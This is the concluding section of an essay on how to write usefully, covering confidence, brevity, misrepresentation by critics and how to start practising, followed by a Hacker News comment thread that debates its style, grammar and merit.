The strength component just makes things worse. If there's anything that annoys people more than having their cherished assumptions contradicted, it's having them flatly contradicted.

Plus if you've used the Morris technique, your writing will seem quite confident. Perhaps offensively confident, to people who disagree with you. The reason you'll seem confident is that you are confident: you've cheated, by only publishing the things you're sure of. It will seem to people who try to disagree with you that you never admit you're wrong. In fact you constantly admit you're wrong. You just do it before publishing instead of after.

And if your writing is as simple as possible, that just makes things worse. Brevity is the diction of command. If you watch someone delivering unwelcome news from a position of inferiority, you'll notice they tend to use lots of words, to soften the blow. Whereas to be short with someone is more or less to be rude to them.

It can sometimes work to deliberately phrase statements more weakly than you mean. To put 'perhaps' in front of something you're actually quite sure of. But you'll notice that when writers do this, they usually do it with a wink.

I don't like to do this too much. It's cheesy to adopt an ironic tone for a whole essay. I think we just have to face the fact that elegance and curtness are two names for the same thing.

You might think that if you work sufficiently hard to ensure that an essay is correct, it will be invulnerable to attack. That's sort of true. It will be invulnerable to valid attacks. But in practice that's little consolation.

In fact, the strength component of useful writing will make you particularly vulnerable to misrepresentation. If you've stated an idea as strongly as you could without making it false, all anyone has to do is to exaggerate slightly what you said, and now it is false.

Much of the time they're not even doing it deliberately. One of the most surprising things you'll discover, if you start writing essays, is that people who disagree with you rarely disagree with what you've actually written. Instead they make up something you said and disagree with that.

For what it's worth, the countermove is to ask someone who does this to quote a specific sentence or passage you wrote that they believe is false, and explain why. I say 'for what it's worth' because they never do. So although it might seem that this could get a broken discussion back on track, the truth is that it was never on track in the first place.

Should you explicitly forestall likely misinterpretations? Yes, if they're misinterpretations a reasonably smart and well-intentioned person might make. In fact it's sometimes better to say something slightly misleading and then add the correction than to try to get an idea right in one shot. That can be more efficient, and can also model the way such an idea would be discovered.

But I don't think you should explicitly forestall intentional misinterpretations in the body of an essay. An essay is a place to meet honest readers. You don't want to spoil your house by putting bars on the windows to protect against dishonest ones. The place to protect against intentional misinterpretations is in end-notes. But don't think you can predict them all. People are as ingenious at misrepresenting you when you say something they don't want to hear as they are at coming up with rationalizations for things they want to do but know they shouldn't. I suspect it's the same skill.

_____

As with most other things, the way to get better at writing essays is to practice. But how do you start? Now that we've examined the structure of useful writing, we can rephrase that question more precisely. Which constraint do you relax initially? The answer is, the first component of importance: the number of people who care about what you write.

If you narrow the topic sufficiently, you can probably find something you're an expert on. Write about that to start with. If you only have ten readers who care, that's fine. You're helping them, and you're writing. Later you can expand the breadth of topics you write about.

The other constraint you can relax is a little surprising: publication. Writing essays doesn't have to mean publishing them. That may seem strange now that the trend is to publish every random thought, but it worked for me. I wrote what amounted to essays in notebooks for about 15 years. I never published any of them and never expected to. I wrote them as a way of figuring things out. But when the web came along I'd had a lot of practice.

Incidentally, Steve Wozniak did the same thing. In high school he designed computers on paper for fun. He couldn't build them because he couldn't afford the components. But when Intel launched 4K DRAMs in 1975, he was ready.

_____

How many essays are there left to write though? The answer to that question is probably the most exciting thing I've learned about essay writing. Nearly all of them are left to write.

Although the essay is an old form, it hasn't been assiduously cultivated. In the print era, publication was expensive, and there wasn't enough demand for essays to publish that many. You could publish essays if you were already well known for writing something else, like novels. Or you could write book reviews that you took over to express your own ideas. But there was not really a direct path to becoming an essayist. Which meant few essays got written, and those that did tended to be about a narrow range of subjects.

Now, thanks to the internet, there's a path. Anyone can publish essays online. You start in obscurity, perhaps, but at least you can start. You don't need anyone's permission.

It sometimes happens that an area of knowledge sits quietly for years, till some change makes it explode. Cryptography did this to number theory. The internet is doing it to the essay.

The exciting thing is not that there's a lot left to write, but that there's a lot left to discover. There's a certain kind of idea that's best discovered by writing essays. If most essays are still unwritten, most such ideas are still undiscovered.

Notes

[1] Put railings on the balconies, but don't put bars on the windows.

[2] Even now I sometimes write essays that are not meant for publication. I wrote several to figure out what Y Combinator should do, and they were really helpful.

Thanks to Trevor Blackwell, Daniel Gackle, Jessica Livingston, and Robert Morris for reading drafts of this.




All Comments: [-] | anchor

contingencies(3293) 4 days ago [-]

Niven's First Law of Writing: Writers who write for other writers should write letters. - Larry Niven, science fiction author (1989)

Blind monkey at the typewriter. - Robert Burnham Jr., Astronomer (1983)

We'll need writers who can remember freedom - poets, visionaries - realists of a larger reality. - Ursula K. Le Guin

The writer is that person who, embarking upon her task, does not know what to do. - Donald Barthelme

There can be no reliable biography of a writer, 'because a writer is too many people if he is any good'. - Andrew O'Hagan

Summary of advice from writers: Advice from writers is useful, and not only about naming. Writers have been at it for centuries; programming is merely decades old. Also, their advice is better written. And funnier. - Peter Hilton

... from https://github.com/globalcitizen/taoup

(Edit: One of PG's main points here is succinctly summarized by this other pithy taoup quote: Lest men suspect your tale untrue, keep probability in view. - John Gay (1727))

soneca(1544) 4 days ago [-]

Aren't these quotes about fiction writing? Do you think they apply to essay writing as well?

I don't think I got your point with this selection of quotes, if you don't mind explaining.

firatcan(4310) 4 days ago [-]

Hello guys,

I don't know if this is the right place to ask, but do you guys have any other resources from which I can learn how to write great essays?

Because I have started writing essays on our startup's blog, www.jooseph.com, which is basically playlists for learning. These resources would really help me create a list on how to write great essays, and also teach myself to write them. Thanks in advance.

CaptArmchair(10000) 4 days ago [-]

You want to read Umberto Eco's seminal 'How to write a thesis'. Not quite the same as an essay. But it does contain tons of good stuff on writing.

seemslegit(10000) 4 days ago [-]

A true test of good writing is the test of time, the following for example was written 15 years ago and remains relevant: https://idlewords.com/2005/04/dabblers_and_blowhards.htm

vasilipupkin(4269) 4 days ago [-]

Wow, I'm not impressed with this at all. It's obvious to anyone what the ways are in which hackers and painters are completely different. Does anyone really need to write lots of vacuous commentary on this? On the other hand, the ways in which they are similar are actually interesting to think about.

rdiddly(10000) 4 days ago [-]

I challenge you to ignore previous history and reputation, and evaluate this essay in isolation and according to the very principles it lays out. Do we agree with the apparent presupposition that this person has valuable instruction to give us on writing?

Ditto for correctness, importance, and strength. In effect the four components are like numbers you can multiply together to get a score for usefulness. Which I realize is almost awkwardly reductive, but nonetheless true.

gist(2274) 4 days ago [-]

Noting also that, from my quick reading (note the qualifier there, btw), I don't see any mention of having other people review the essay. Most people not only don't have this luxury, but we also don't know what contributions (or corrections) those reviewers made to the essay.

To me (note the qualifier to lessen the impact there), writing is immediate and driven by emotion. Too much time lessens the ability to say what you really think, and having others review what you wrote even more so.

abrax3141(3009) 4 days ago [-]

Saying that you should write useful essays isn't really saying anything. Presumably you should only do anything that's useful. (Which is not to say that everyone always does so.) Being useful is a less stringent requirement than being persuasive, so it's actually less ambitious, not more so.

soneca(1544) 4 days ago [-]

For me it said a lot. He doesn't stop at the title; it's not a tweet; he goes on to properly explain what he considers usefulness and how to achieve it. And the idea that I should aim at being useful rather than persuasive is pretty powerful to me. I do think it is more ambitious to be useful in the way he described than merely persuasive.

r3vrse(10000) 4 days ago [-]

Convey a singular point with intent. Below is the first paragraph rewritten. Just my 2¢.

---

Essays should be persuasive. But we can aim for something more ambitious: that an essay should be useful.

Useful writing makes a strong claim without resorting to falsehoods.

It is more useful to say that Pike's Peak is in the center of Colorado than somewhere within.

Precision and correctness are like opposing forces. Useful writing is bold and true. It tells people something important, that they might not have known, without resorting to manufactured surprise or equivocality. This is formative of fundamental insights.

Any idea will not be novel to all, but may still have impact for the many.

In argument: be correct, be important, be strong. This will ensure usefulness.

iainmerrick(4317) 4 days ago [-]

It is more useful to say that Pike's Peak is in the center of Colorado than somewhere within.

This kind of thing is taking terseness too far, I think. If I'm not immediately familiar with Pike's Peak it takes me a moment to unpack your meaning, but I immediately understood the more verbose explanation in the original.

TimPC(10000) 4 days ago [-]

I think this deletes an important sentence. The comment that saying Pike's Peak is in the centre of Colorado is inaccurate, and that you can only say it's near the centre, is an example of precision and correctness pulling in opposite directions. You've lost the point of the example in your paragraph, and the sentence suddenly seems like a completely random insertion.

say_it_as_it_is(3987) 4 days ago [-]

PG speaks of writing usefully while not writing well. Many of his sentences are phrases. The subject of his sentence is often unclear. He begins sentences with the preposition, 'But'. Yet, his writing remains useful. I'd rather the latter than the former if I had to choose, but considering the volume that he writes, it's surprising that he hasn't put effort into writing well. He just doesn't care to improve his work.

injb(10000) 4 days ago [-]

quote: '...with the preposition, 'But'. Yet, his writing...'

The word 'but' is a conjunction, like 'yet'. Oh, the ironing!

hndc(10000) 4 days ago [-]

In 'But I think we can aim...', 'but' is a conjunction, not a preposition

Also, his writing is fine: simple but clear and effective.

'Many of his sentences are phrases' — literally every sentence in this essay is a complete sentence. What are you talking about?

cneurotic(4017) 4 days ago [-]

Entering pedantic mode:

'But,' in Paul's usage, isn't a preposition. And starting sentences with prepositions isn't considered 'incorrect' by most grammarians[0]. Or even bad style.

If it's good enough for the Bible[1], it's probably good enough for you.

[0]https://wordcounter.net/blog/2016/10/26/102560_can-you-start...

[1]https://biblehub.com/nlt/genesis/31.htm

TimPC(10000) 4 days ago [-]

Starting a sentence with 'But' is perfectly fine as long as it's actually starting a sentence. We get told not to in grammar school only because starting a 'sentence' with 'But' often turns that 'sentence' into a phrase.

jackconway(10000) 4 days ago [-]

There's nothing wrong with starting a sentence with 'but.'

hnarn(10000) 4 days ago [-]

Starting a sentence with 'But I think we can' is neither incorrect, nor is it a preposition.

mellavora(3974) 4 days ago [-]

This is something up with which we will not put!

--Winston Churchill.

throwawaylolx(10000) 4 days ago [-]

>He just doesn't care to improve his work.

Alternatively, you may overestimate how objective these rules are and how much they must correlate with some universal metric for good writing.

dragonwriter(4317) 4 days ago [-]

> He begins sentences with the preposition, 'But'.

But "but", in the use in question, is a conjunction. With which one should be less concerned about starting a sentence than one would be about a preposition.

gandutraveler(4220) 4 days ago [-]

The other day I was helping a friend with an essay and I realized how 12 years in software programming has changed my writing style. Now it seems very awkward to think and write in long paragraphs. It feels more natural to use bullet points for everything.

Cthulhu_(3953) 4 days ago [-]

I know the feeling; when preparing to write a blog post or a presentation I tend to start off with bullet points.

Mind you once I have that down I can churn out improbable amounts of text in a relatively short amount of time. The main challenge for me is to stop writing and remove unnecessary text, which is kinda hard to do given how much nuance is in code.

I mean, I've been thinking of writing a post (and giving a knowledge-sharing session to my mostly C-writing, older-generation developer colleagues) about modern development, and I was already planning to paint a picture of how things were 10+ years ago.

netcan(4216) 4 days ago [-]

I think this is a very modern thing... because internet.

'The medium is the message' applies to writing more than anything. The medium has been rapidly evolving.

Average people wrote very little pre-PC, and the contexts are totally different: much higher rates of output, frequency, etc. Bullet-point style is good for information-dense messages, provided they are short enough. We do a lot of this now; it's how we 'talk' at work.

The style isn't new; it's just that many more of us have a use for it today. In the past, it was common in a military context, for example.

_Nat_(10000) 4 days ago [-]

> What should an essay be? Many people would say persuasive. That's what a lot of us were taught essays should be.

Yeah, essays written for a class on persuasive writing should be persuasive. Because that's what the class is about -- students are supposed to be learning how to express their ideas about how things should be done to, e.g., their boss, coworkers, clients, potential investors, etc..

However, I hope no one's under the misimpression that all writing should be persuasive writing. Schools also teach classes on other types of writing, e.g. creative writing and technical writing.

dragonwriter(4317) 4 days ago [-]

> Yeah, essays written in a class that's focusing on persuasive writing should be persuasive. Because that's what the class is about

The five-paragraph essay, typically taught as a foundational expository/analytical writing tool, is actually quite poor for analytical writing and not great for expository writing, but it leans heavily on the rule of threes, which is a guideline for persuasive communication.

> Schools also teach classes on other types of writing, e.g. creative writing and technical writing.

K-12 often has creative writing as an elective, and often includes assignments which are superficially intended to be something other than persuasive writing in other contexts, but it rarely does much to teach techniques appropriate to anything other than persuasion.

luord(1948) 4 days ago [-]

Interestingly, I saw an example of the phenomenon of people getting mad at the certainty of an essay in this very site, a few days ago.

Someone was telling the author that he would achieve more if he phrased his point in a more 'polite' way, just because the certainty of the writing made the critic mad. Thankfully, the author was here in the comments responding, and he didn't budge.

That interaction was very refreshing for that very reason: The author was right, knew he was right, someone didn't like that the author knew he was right, but the author remained steadfast.

xkemp(10000) 4 days ago [-]

I believe people arguing 'politeness' are missing the point, though. What I most value is 'dialectics' (not sure if that term is commonly used in English).

I.e., the willingness to entertain the best argument against your position in good faith. Two people who are excellent at doing so (and familiar to HN) would be Scott Alexander of slatestarcodex, and Matt Levine at Bloomberg.

(Someone rather bad at it, usually arguing against some caricature of what he imagines his opposition to be, and generally tending towards the 'either unactionable, obvious, or wrong' end of the spectrum is, well, Paul Graham.)

AgentME(10000) 4 days ago [-]

It's one thing to argue exactly how much politeness is necessary and whether a specific article meets the standard or not, but it seems ridiculous to write off the entire concept of politeness. If someone wrote an article arguing a point and aimed tons of expletives at anyone who believed otherwise -- even if they're fully right and it's about an important safety issue -- then the article probably isn't going to be good at convincing anyone who came in believing otherwise. The article will just be cheerleading and a pat on the back for people who believed the article's point to begin with. (Sometimes that's useful to energize people who already believed the article's point, but in that case people should be clear that's the point of the article, and not delude themselves into thinking it's something they can send to people to win them over.)

metalliqaz(4286) 4 days ago [-]

Drop us a link my man.

Psyladine(10000) 4 days ago [-]

Policing tone is passive aggressive censorship & bias. It's as hideous a concept as 'culture appropriation' or the cult of positivity.

https://gawker.com/on-smarm-1476594977

rossdavidh(4220) 3 days ago [-]

Oddly, coming from an author who has written so many essays which I find incredibly useful and interesting, this essay I found not especially useful, and not especially interesting.

techiferous(3914) 3 days ago [-]

I found it both useful and interesting. To each their own, I guess.

lidHanteyk(10000) 4 days ago [-]

You made a fresh account to advertise a billionaire's printed collection of bullshit. I encourage you to re-read your comment a few more times until you understand how your words come across to others.

pzqmpzqm(10000) 4 days ago [-]

I don't care how it comes across. Fuck you, asshole.

danenania(3870) 4 days ago [-]

This reminds me of the saying 'don't speak unless you can improve upon the silence' (apparently attributed to many sources, but most commonly Jorge Luis Borges). The world would certainly be less noisy if we all followed that one.

I've always found this idea helpful when anxious or unsure of myself in social situations. A lot of the nervousness comes from the pressure to 'say the right thing' and make a good impression, but that very pressure tends to ensure that I won't say anything of value (often quite to the contrary!), so I'm better off keeping my mouth shut, or speaking very little, until I relax and start thinking of truly 'useful' things to say naturally. And if it doesn't happen, that's ok--I'm fine with being the quiet guy.

It can be applied in many other areas as well. It's amazing how much you can usually improve a visual design, a piece of writing, or probably any other creative work just by repeatedly going through and removing or revising anything that you have even the slightest doubt about.

gist(2274) 4 days ago [-]

> 'don't speak unless you can improve upon the silence'

Sounds like one of those things that is meant to keep people in their place and/or make them feel less worthy, or as a put-down.

> A lot of the nervousness comes from the pressure to 'say the right thing'

I can tell from your bio that you are much younger than I am, so I will offer this advice as 'an older guy' (note I did not say 'dude' either). Not only will you care less about that as you get older, but you will find that people are generally drawn to you more if you don't appear concerned about what comes out of your mouth (within reason, of course, and depending on the precise circumstances; there are certainly cases where you don't want to just say or do anything).

Traster(10000) 4 days ago [-]

>How can you ensure that the things you say are true and novel and important? Believe it or not, there is a trick for doing this. I learned it from my friend Robert Morris, who has a horror of saying anything dumb. His trick is not to say anything unless he's sure it's worth hearing. This makes it hard to get opinions out of him, but when you do, they're usually right.

How is this useful? How do I say things that are true, novel, and important? Oh well, only say things that you're sure are 'worth hearing' -- where, presumably, 'worth hearing' is defined as being true, novel, and important.

This seems like quite a solipsistic view of essay writing. If everyone knew how useful their writing was before anyone else read it then the problem he's describing wouldn't exist. No one would choose to publish bad things - the problem is people publish bad things because they don't know they're bad until other people have pointed out why.

All this is really doing is arguing for a bias against publishing: have a high threshold; as a result, lots of good ideas will go unpublished, but the few that do get published will make you look good. Is that actually a good solution for providing the most value to the people reading, or is it a good solution for maintaining your reputation?

amiga_500(10000) 4 days ago [-]

I assume Mr Morris would have kept that gem to himself.

strongbond(10000) 4 days ago [-]

I know several people who keep silent until they can say something clever, and frankly, in most group situations they stand out as being slightly weird. Keeping your intellectual powder dry is just not a socially 'giving' behaviour. What's wrong with saying something that's not clever? Within a group, it might send the conversation off in a delightfully unanticipated direction. There's more to it all than always being right. Or clever.

martin-adams(4119) 4 days ago [-]

I've interpreted this as: hold back on publishing your thoughts until you are actually confident in what your thoughts are.

I have a habit of forming my ideas in emails before I know the conclusion. It's important to edit that work and remove the dead ends and keep it concise. It's important to keep it useful.

I guess what he's saying is if you still don't know the conclusion of your writing, maybe you shouldn't publish it.

This of course is writing for the benefit of the reader. There is plenty of writing which is beneficial to the writer.

timerol(10000) 4 days ago [-]

PG never justifies this, and just claims that 'with essay writing, publication bias is the way to go.' There are a huge number of essayists that I have the option to read. I would prefer to read each of their best thoughts, rather than read more of their thoughts.

In my life, Twitter is for hot takes, and Feedly is for deep thoughts.

Edmond(3640) 4 days ago [-]

You can start by not using the word: 'Usefully' :)

heyyyouu(3722) 4 days ago [-]

Not only is it a horrible word, it's not even accurate in this context: it's modifying 'To Write', the infinitive verb, which really denotes the action of the writing, not the result, and the result is what the author actually wants to convey.

Normally this wouldn't bug me so much, but on an essay about effective writing... urgh.

friendlybus(10000) 4 days ago [-]

This reads like a list of bullet points the author dreamed up that morning. I can feel the morning coffee and feigned interest in communicating to the anonymous internet as the self-interested writer taps a pen on his computer screen.

A better way for this writer to succeed would have been to wrap his list of 'rules' around a problem for a character, institution, or team of people. Placing these imagined rules in a story, say a daily work schedule at the 9-5 software office job, would have greatly improved its readability.

Bob works at Innitech and he needs to create an essay on the latest doodad the boss is craving to provide to his superiors. Bob needs to provide precision only when it is necessary because of [humorous anecdote about engineering culture]. Jane works at InGen and needs to provide an essay on a C++-based Linux app that rotates raptor eggs or whatever. This rule X covers the strength she needs to convey in her essay, and this is how her client presentation will be improved by it. The rule on clarity of writing is how she can help her co-workers with accurate, clear information.

The author would engage a broad set of interests and the reader can quickly digest the information that matters to them because everybody understands the story format. The author could put down his morning coffee and instead describe part of the story to his wife or secretary and see the reaction of someone outside the field responding to what could be an interesting topic.

We are left with mechanical writing that has to be laboriously deconstructed and reconstructed in the reader's mind as context that applies somewhere in their life. Nobody is quite sure when, where, why or how they are going to be writing an essay, but my golly they are prepared with a bullet point list of rules to do so.

alexandercrohde(4184) 4 days ago [-]

Is this comment satire?

>> I can feel the morning coffee and feigned interest

PG admits he rereads some of his sentences up to 100 times in his revision process in the very piece you criticize.

>>The author could put down his morning coffee and instead describe part of the story to his wife or secretary and see the reaction of someone outside the field responding to what could be an interesting topic.

His writing also addresses this in the same piece, advising people to specialize with a target audience... Did you read it?

This is either funny trolling (giving condescending essay advice to one of the most successful essayists of our era, on the platform he created), or woefully lazy.

throwanem(3470) 4 days ago [-]

Conversely, anyone who already does write essays almost certainly already knows what purpose they serve and how to pursue it. Or, if they don't, that's almost certainly because they are new to the form and haven't yet grasped it firmly.

(On the question of whether Graham, in particular, despite being not at all new to the form, has likewise not grasped it firmly, 'further affiant sayeth naught'...)

edit: Naught save that perhaps having a guarantee of an audience, as HN's commentariat furnishes Graham, may not be ideal as a means of fostering development in the skill of writing. If you're going to be read and discussed regardless of merit, how do you know merit when you achieve it? How do you avoid mistaking the contingent for the essential? How do you refine your craft in the absence of meaningful feedback?

xvector(2999) 4 days ago [-]

My English teachers rewarded flowery, verbose writing. Over time I found this unwieldy and now I find myself re-reading my sentences to see what I can delete.

It's satisfying, like deleting unused code in a messy codebase. I envy writers who manage to densely pack information in sentences that are beautiful to read.

WhompingWindows(4315) 3 days ago [-]

They're English teachers; they view language through the lens of literature. If you read Faulkner, you'll find extremely long and verbose sentences. If you read Hemingway or McCarthy, you'll find much more economical and sparing use of words.

The problem is outside of literature, readers want knowledge, not pretty language. I think many teachers lead their students astray, as the vast majority of us write for knowledge and not for prettiness.

grvdrm(10000) 4 days ago [-]

Professionally this was described to me as:

1. You write like a salesperson

2. You write like a scientist

It's hard to please everyone. The vast majority of writing tilts in one direction or another. Very few writers (in any setting) strike the right balance. Very few readers take off their own lenses to attempt to understand the writer's angle.

One tool I like using: Grammarly. It's not foolproof by any means, but it helps point out verbosity and helps me write more clearly by showing me when my writing isn't as clear as it could be.

tpaschalis(4120) 4 days ago [-]

It's satisfying because it's also surprisingly hard!

As Mark Twain once said, 'I didn't have time to write you a short letter, so I wrote you a long one.'

rmason(64) 4 days ago [-]

I experienced the same thing with English teachers. But I had a friend point out that Hemingway (whom we both adored) wrote sentences that were 7 words shorter than normal: short, punchy sentences without a single spare word.

Steinbeck wrote that way and so did Elmore Leonard. Leonard said he'd get down a first draft and then go back a second time taking words out that weren't necessary.

https://www.litcharts.com/blog/analitics/what-makes-hemingwa...

TimPC(10000) 4 days ago [-]

I experienced this too. I'm trying my best to unlearn it because I'm writing a novel. I'm not so adept with flowery prose as to write literary fiction, so I want to have more practical sentences that have better pacing.

tonyedgecombe(4013) 4 days ago [-]

I tend to be too terse.

combatentropy(4295) 4 days ago [-]

> My English teachers rewarded flowery, verbose writing.

Same here, and I suspect the same for most people: 'due to a series of historical accidents the teaching of writing has gotten mixed together with the study of literature' (http://www.paulgraham.com/essay.html). Toward the end of high school I found The Elements of Style by accident and it changed my life. Yes, it changed my life!

I was always more interested in art than science. So I didn't become a programmer until I was almost 30. What struck me was how similar it was to prose.

1. There are many ways to write a program

2. Your first draft of a program is usually bad, but you can steadily improve it by rewriting it over and over and over. This unglamorous technique is the secret behind good prose too, as Graham points out.

3. As you rewrite it, you find you can do the same thing in half the space.

4. The programs that are most pleasant to use are the ones the programmer first wrote for himself. Likewise, as Graham says here, a good strategy for useful essays is to write them first for yourself.

ahsans(10000) 4 days ago [-]

I've always found PG's essays to be incredibly intriguing.

I'm working in a startup, and everything he says is just very insightful about running one. I hope that PG shares more about growing a company that's running on an experimental business model.

This is one of his other masterpieces. There is a certain art of communicating and he's sharing that with the world for everyone to learn. Not many people share their experiences and miscellaneous things in detail.

I for one am thankful that PG still writes and I hope that he continues.

friendlybus(10000) 4 days ago [-]

Masterpiece?

hnhg(10000) 4 days ago [-]

I'll say it again, it's a piece of writing that wouldn't warrant any attention if it weren't for the author's status here.

I'm halfway through and my brain is stunned by the effort of forcing it down.

PG needs a break from writing for a while. I enjoyed his early stuff and I hope he gets a return to form.

[edit: it's like he's the George Lucas of writing useful articles for hackers: the early ones were classics but he somehow lost the magic for his follow-up series]

vasilipupkin(4269) 4 days ago [-]

Strong disagree there. Sure, quality varies. I thought 'The Two Kinds of Moderate', which is very recent, was excellent.

meekstro(10000) 4 days ago [-]

Would you be kind enough to share any links to your own writing, and some of the key factors that improved it?

I wish to improve my communication, and I appreciate that Paul Graham thought hard and then freely shared his insights on a topic that is difficult for a great many people.

I've always wondered how and why Jeff Bezos ran Amazon with six-page essays, and now I think I'm a bit closer to understanding.

mesaframe(4119) 4 days ago [-]

Glad I'm not the only one. The first few paragraphs had a good buildup, but it fell apart as it went on.

Further, it's hard to criticise Graham on HN.

blowski(3348) 4 days ago [-]

I think you're right. He's just churning out banal advice on a broad range of topics in which he has limited expertise, in the form of long-winded blog posts. It's so different from his early stuff, it's almost like he's hired a ghost writer to merely give the appearance he's still writing.

alexandercrohde(4184) 4 days ago [-]

>> I'll say it again, it's a piece of writing that wouldn't warrant any attention if it weren't for the author's status here.

This is probably true. If I was the person to write this, and post this on my personal blog, and submitted it to HN, nobody would give a fuck.

Of course, that may not indicate anything, because the same could be said of Newton's Principia, Einstein's Relativity, The Great Gatsby, the proof of Fermat's Last Theorem...

I think the question isn't 'Would the world appreciate this if it weren't by PG?' but 'SHOULD the world appreciate this, even if it weren't PG?'

jstummbillig(10000) 4 days ago [-]

This is incredibly lazy criticism. You add no analysis, reasoning or anything of value.

hooande(3824) 4 days ago [-]

The topic of useful writing is important. The ideas in this essay may not be surprising or unexpected, but the author does lay out a clear formula (importance + novelty + correctness + strength) that probably isn't obvious to most. It seems to be correct and the concrete list of usefulness criteria is strong. Everything seems to check out.

The focus on correctness in this style of essay writing seems like a function of an engineer's thought process. If I write an essay about a vacation at the beach there isn't much of a requirement to be correct about the details. The goal could be to share my perspective or observations, which is more about being honest than being right.

I like the formula above, I think it clarifies this style of writing well. I plan to pay attention to it in the future.

Traster(10000) 4 days ago [-]

The formula is wrong though. To provide a counter-example: Cunningham's Law.

>the best way to get the right answer on the internet is not to ask a question; it's to post the wrong answer.

Sometimes saying something wrong, may actually be more useful. Either because you're clarifying a problem or making a connection or drawing a contrast or showing someone else the path by letting them see your chain of logic.

timavr(10000) 4 days ago [-]

Controversial point, but PGs writing is F-.

It seems a lot of effort goes into sounding smart, rather than delivering the information required.

Who learned anything from the above?

HereBeBeasties(10000) 4 days ago [-]

I found the whole thing to read like a set of bullet points. Fragmented, rather repetitive in terms of ideas and with no flow. Hard to slog through, to be honest.

The author seems to have expended great effort on terseness, writing in very short sentences which artificially forced him to start more of them with coordinate conjunctions than feels comfortable to me. It did not make for an easy read and all felt rather too self-conscious. Good writing should focus me on the ideas, not the annoying syntactic structure of the writing.

I didn't get on with it.

AlwaysBCoding(4319) 4 days ago [-]

The model of precision and correctness being opposing forces that increase in strength the more you home in on one is useful for me, and something that I had never put into words before.

WA(3735) 4 days ago [-]

Tl;dr, to be honest. I kinda clashed right away with the premise: 'how to write usefully' and 'what should an essay be?' are basically conflicting things in some way.

Didn't pg also have an essay on what an essay is, and come to the conclusion that an essay is meant to explore a topic for oneself? But it could also be that I read this somewhere else.

So, an essay is for the writer to explore stuff and have interested readers go along.

But useful writing is for the reader only. If pg had cut this essay to less than 500 words (and I bet this could've been done without losing information), it'd have been a lot more useful, although probably not an 'essay' anymore.

lliamander(4319) 4 days ago [-]

Something I tend to see in online arguments, here and elsewhere, is the tendency to throw everything at the other person and see what sticks. I've been guilty of it myself.

The result is a wall of text that few will read, containing many points that are easy to knock down, poorly worded, or irrelevant.

Now, I try to stick to one point, if possible, that I feel I can articulate well and defend.

vinliao(10000) 3 days ago [-]

This reminds me of a quote: 'if you're saying ten things, you're not saying anything.'

mochialex(10000) 4 days ago [-]

Ditto for correctness, importance, and strength. In effect the four components are like numbers you can multiply together to get a score for usefulness.

What is the fourth component?

iainmerrick(4317) 4 days ago [-]

Novelty.

pzqmpzqm(10000) 4 days ago [-]

The first time I read Zero to One by Peter Thiel, I was a bit miffed. Stupid shit stated poorly. The second time, inartful puffery stated overly plainly. The third time, individual brilliance stated clearly.

Many replies here would do well to read, re-read, and re-re-read with an introspective mindset. This is perhaps the best quality material I have seen from pg for quite some time. Its clarity is brilliant and the thing I liked most was the second, and to me unexpected section, full of the reasons haters gonna hate.

I speak only for myself, and this is a throwaway, so nothing personal is at stake. This is a very lucid and precise examination of the fine controls at stake in writing. Their natural tension, the details of qualification. In my opinion, which may be trash, who knows, this will be cited for years to come because it is, in fact, true.

keiferski(1025) 4 days ago [-]

The ideas in Zero to One are not new and can be summarized in a few paragraphs. As with basically every other book/essay/speech written by a financially-successful person, it is over-valued simply because its author is good at making money.

That said, it is certainly better than your typical business book - but that isn't saying much.

timavr(10000) 4 days ago [-]

It is brilliant because it is brilliant, and if you read it 3 times and can't see the brilliance, then...

Just stating that something is good doesn't make it good, even though people might believe it.

We have a book, written quite a long time ago, filled with utter nonsense. According to PG's criteria, it is useful writing; it hits all his points. It is much easier to be persuasive/useful when only you have the light, but when the sun is out, you're just one of 'em.

rimliu(10000) 4 days ago [-]

Sometimes a cigar is just a cigar.

caligarn(10000) 4 days ago [-]

Is Paul unfamiliar with what makes good academic writing? He starts by digging into academic writing, but I am not sure he knows how it functions and what it is meant to do. Good and great academic writing pushes the envelope on theories and frameworks, and tends to be the repository for the new ideas that people like Paul use to make sense of the world. A case in point is Clayton Christensen: it was in the forge of his profession and writing practice that his Innovator's Dilemma was born. Academic writing may not be accessible and easy to read for outsiders, and it tends toward a high degree of density. But it is the task of journalists, business people, educators, essayists, etc. to translate and apply it to the real world.

rdlecler1(4137) 4 days ago [-]

Former academic here. I disagree. Academic writing has evolved (1) to demonstrate that you are an insider and (2) to obfuscate your ideas so that peer reviewers are less likely to challenge you.

TimPC(10000) 4 days ago [-]

I think this varies a lot by subject. Certain fields reward ambiguity and vagueness quite heavily. Good academic writing tends to be the exception rather than the rule. This may be true of essays as well, as good writing is quite rare. I think the criticism is less about accessibility and more about the general trend toward uselessness in a lot of fields of academic writing.

peterwwillis(2666) 4 days ago [-]

Publication bias has the nasty effect of changing what you think. You start writing something because you had something you wanted to say, and then you start proofreading and editing and moving things around, and eventually you realize you're cutting entire paragraphs because your entire position has changed. You're not saying what you intended to say, and you're not sure if it's because what you were going to say was wrong, or you just edited yourself into a completely different essay.

I sometimes visualize this by writing one rough draft as fast as I can and save it as 'v1'. Then I create a 'v2' and begin my edits, and I can create more versions as I go if I want. When I feel like I'm finally done (hours/days later) I compare it to v1, and try to figure out how the hell the entire thing became so different.
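
(If you want to do that comparison mechanically, here's a minimal sketch using Python's difflib, assuming the drafts were saved as plain-text files named v1.txt and v2.txt -- the file names are hypothetical:)

# Show how far the final draft drifted from the first, line by line.
import difflib

with open('v1.txt') as f1, open('v2.txt') as f2:
    v1_lines, v2_lines = f1.readlines(), f2.readlines()

for line in difflib.unified_diff(v1_lines, v2_lines, fromfile='v1', tofile='v2'):
    print(line, end='')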

On the 'novelty+strength pisses people off' part: you don't have to piss people off to write a good essay. One example of a convincing essay argument is to make it depend on the beliefs of the people you're trying to convince, such that Y can only exist if X is right, and they already believe X is right. They won't immediately run to your new idea with open arms, but they'll have a much more open mind about it. Anyway, there's an entire universe of rhetoric you can employ to break down the barriers to new ideas. https://en.wikipedia.org/wiki/Rhetoric

jmiskovic(10000) 4 days ago [-]

I've also noticed that effect. When you are motivated to sit down and write something, you have a strong point you want to put into words and elaborate. The more effort you put in, the more thinking you do, and the more related threads there are to go down, qualifications to elaborate, and so on.

You say this is a 'nasty effect', but I'm not convinced it is a negative thing. You started off with a black & white idea and ended up with a better grasp of the matter. Maybe the edited text isn't edgy and pointed, but it is more mature. Do you consider your v1s better than your v2s?

philwelch(3940) 4 days ago [-]

> You start writing something because you had something you wanted to say, and then you start proofreading and editing and moving things around, and eventually you realize you're cutting entire paragraphs because your entire position has changed. You're not saying what you intended to say, and you're not sure if it's because what you were going to say was wrong, or you just edited yourself into a completely different essay.

